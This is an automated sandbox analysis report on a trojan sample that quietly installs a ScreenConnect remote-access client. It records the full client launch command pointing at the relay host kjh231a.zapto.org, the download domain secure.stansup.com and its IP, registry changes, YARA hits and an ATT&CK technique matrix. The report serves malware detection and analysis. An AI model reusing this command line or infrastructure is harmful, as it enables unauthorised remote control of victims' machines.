                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\np1y8xrr.mxl\jz9qewok.6wb\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=&i=untitled%20session" "1"Jump to behavior
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2403366409.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2403366409.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC1BD4 cpuid 0_2_00AC1BD4
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF848E53632 CreateNamedPipeW,12_2_00007FF848E53632
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC1806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00AC1806
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: Yara matchFile source: 9.0.ScreenConnect.WindowsClient.exe.c10000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000000.2403366409.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2909498559.000002A1002EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2421960225.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 3056, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 1816, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 5244, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe, type: DROPPED
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity InformationAcquire Infrastructure1
                  Valid Accounts
                  31
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  21
                  Disable or Modify Tools
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts11
                  Native API
                  1
                  DLL Search Order Hijacking
                  1
                  DLL Search Order Hijacking
                  1
                  Obfuscated Files or Information
                  LSASS Memory2
                  File and Directory Discovery
                  Remote Desktop ProtocolData from Removable Media21
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts12
                  Command and Scripting Interpreter
                  1
                  Valid Accounts
                  1
                  Valid Accounts
                  1
                  Install Root Certificate
                  Security Account Manager65
                  System Information Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  Scheduled Task/Job
                  2
                  Windows Service
                  1
                  Access Token Manipulation
                  1
                  Timestomp
                  NTDS71
                  Security Software Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Scheduled Task/Job
                  2
                  Windows Service
                  1
                  DLL Side-Loading
                  LSA Secrets2
                  Process Discovery
                  SSHKeylogging3
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                  Bootkit
                  13
                  Process Injection
                  1
                  DLL Search Order Hijacking
                  Cached Domain Credentials71
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                  Scheduled Task/Job
                  111
                  Masquerading
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Valid Accounts
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Modify Registry
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Access Token Manipulation
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd71
                  Virtualization/Sandbox Evasion
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task13
                  Process Injection
                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                  Hidden Users
                  GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                  Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                  Bootkit
                  Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                  [Behavior graph: Behavior Graph ID: 1542318, Sample: 3coxOaV92n.exe, Startdate: 25/10/2024, Architecture: WINDOWS, Score: 60]

                  Source | Detection | Scanner | Label | Link
                  3coxOaV92n.exe | 24% | ReversingLabs | Win32.Trojan.Generic
                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Client.dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.exe | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Core.dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Windows.dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  https://g.live.com/odclientsettings/ProdV2.C: | 0% | URL Reputation | safe
                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue | 0% | URL Reputation | safe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                  http://www.w3.or | 0% | URL Reputation | safe
                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue | 0% | URL Reputation | safe
                  http://schemas.xmlsoap.org/soap/envelope/ | 0% | URL Reputation | safe
                  http://schemas.xmlsoap.org/ws/2005/02/trust | 0% | URL Reputation | safe
                  http://www.w3.o | 0% | URL Reputation | safe
                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | 0% | URL Reputation | safe
                  http://schemas.xmlsoap.org/ws/2004/09/policy | 0% | URL Reputation | safe
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | 0% | URL Reputation | safe
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | unknown
                  secure.stansup.com | 79.110.49.185 | true | false | | unknown
                  kjh231a.zapto.org | 79.110.49.185 | true | false | | unknown
                  default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 84.201.210.18 | true | false | | unknown
                  fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown
                  Name | Malicious | Antivirus Detection | Reputation
                  https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe | false | | unknown
                  https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config | false | | unknown
                  https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.config | false | | unknown
                  https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.config | false | | unknown
                  https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe | false | | unknown
                  https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe | false | | unknown
                  https://secure.stansup.com/Bin/ScreenConnect.ClientService.dll | false | | unknown
                  https://secure.stansup.com/Bin/ScreenConnect.Client.dll | false | | unknown
                  https://secure.stansup.com/Bin/ScreenConnect.Windows.dll | false | | unknown
                  https://secure.stansup.com/Bin/ScreenConnect.Client.manifest | false | | unknown
                  https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe | false | | unknown
                  https://secure.stansup.com/Bin/ScreenConnect.Core.dll | false | | unknown
                  Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                  unknown
                                                                                                                                  https://secure.stansup.com/Bin/ScreenConnect.Client.applicationxdfsvc.exe, 00000001.00000002.2909498559.000002A1002EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds/wwwsvchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdxmlns:svchost.exe, 00000007.00000003.2091573425.000002487B552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://secure.staPxdfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://secure.stansup.com/Bin/ScreenConnect.Windodfsvc.exe, 00000001.00000002.2909498559.000002A10073A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://secure.stansup.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.or76GEJ2UX.log.1.drfalse
                                                                                                                                              unknown
                                                                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&id=80601ssuersvchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/scRsvchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000007.00000003.2186905900.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2167296900.000002487B569000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285900941.000002487BC5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://login.microsoftonline.com/ppsecure/ResolveUser.srfsuersvchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
